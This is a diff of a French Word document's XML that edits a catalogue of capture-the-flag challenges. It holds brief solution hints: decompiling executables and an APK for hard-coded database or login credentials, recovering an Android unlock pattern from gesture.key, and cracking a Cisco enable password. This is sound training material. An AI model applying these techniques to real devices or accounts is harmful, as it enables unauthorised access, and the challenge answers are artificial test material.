+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FEEFCFB" wp14:editId="296E2F7C">
+            <wp:extent cx="5760720" cy="1054100"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="14" name="Image 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1054100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7788,7 +7807,88 @@
           <w:szCs w:val="26"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Capture d’écran : </w:t>
+        <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Décompiler</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> les</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>fichiers .exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> puis trouver les ID MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dans le code </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>pour pouvoir</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> se connecter à la base de données via l’interface phpMyAdmin pour pouvoir</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> récupérer le flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7799,6 +7899,7 @@
         </w:rPr>
         <w:br/>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7808,17 +7909,9 @@
           <w:szCs w:val="26"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Solution : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
+        <w:t>Flag</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7828,7 +7921,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille A : </w:t>
+        <w:t xml:space="preserve"> de la faille A : </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -8070,6 +8163,134 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
+        <w:t>L’utilisateur possède un</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fichier </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>apk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C90931" wp14:editId="70F83741">
+            <wp:extent cx="5760720" cy="1310640"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="17" name="Image 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1310640"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
         <w:t>Décompiler l'application APK pour obtenir les identifiants de connexion</w:t>
       </w:r>
       <w:r>
@@ -8079,25 +8300,24 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
+        <w:t xml:space="preserve">, se connecter sur la page </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -8109,18 +8329,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Solution : </w:t>
+        <w:t>et récupérer le flag.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8321,6 +8530,202 @@
         </w:rPr>
         <w:t xml:space="preserve">Objectif de la faille : </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Android déverrouillage schéma</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Difficulté de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Description de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">L’utilisateur télécharge une archive contenant les fichiers </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>sources d’un OS Android, il doit trouver le bon schéma pour déverrouiller le téléphone.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03876F5B" wp14:editId="49801580">
+            <wp:extent cx="5760720" cy="4192905"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="32" name="Image 32"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="4192905"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Solution :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Trouver le fichier </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -8329,7 +8734,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>Android</w:t>
+        <w:t>gesture.key</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -8339,125 +8744,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> déverrouillage schéma</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Difficulté de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Description de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Trouver le schéma pour déverrouiller le téléphone</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Solution : </w:t>
+        <w:t xml:space="preserve">, l’analyser et retrouver l’ordonnancement des points pour déverrouiller le téléphone </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9656,13 +9943,8 @@
         <w:t>Objectif </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Décrypter le mot de passe </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>enable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>: Décrypter le mot de passe enable</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9676,23 +9958,7 @@
         <w:t>Description :</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>enable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> dans un fichier de configuration Cisco, pour cela il a disposition une capture de d’un show </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> d’un routeur Cisco. Il dispose pour seule information des profils utilisateurs</w:t>
+        <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe enable dans un fichier de configuration Cisco, pour cela il a disposition une capture de d’un show run d’un routeur Cisco. Il dispose pour seule information des profils utilisateurs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9734,7 +10000,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId21"/>
                     <a:srcRect l="60000" t="28098" b="4711"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -9774,13 +10040,8 @@
         <w:t>Solution :</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Décrypter les mots de passe des différents profils utilisateurs et faire un croisement avec le mot de passe </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>enable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> Décrypter les mots de passe des différents profils utilisateurs et faire un croisement avec le mot de passe enable</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9961,287 +10222,6 @@
             <wp:extent cx="5760720" cy="1155084"/>
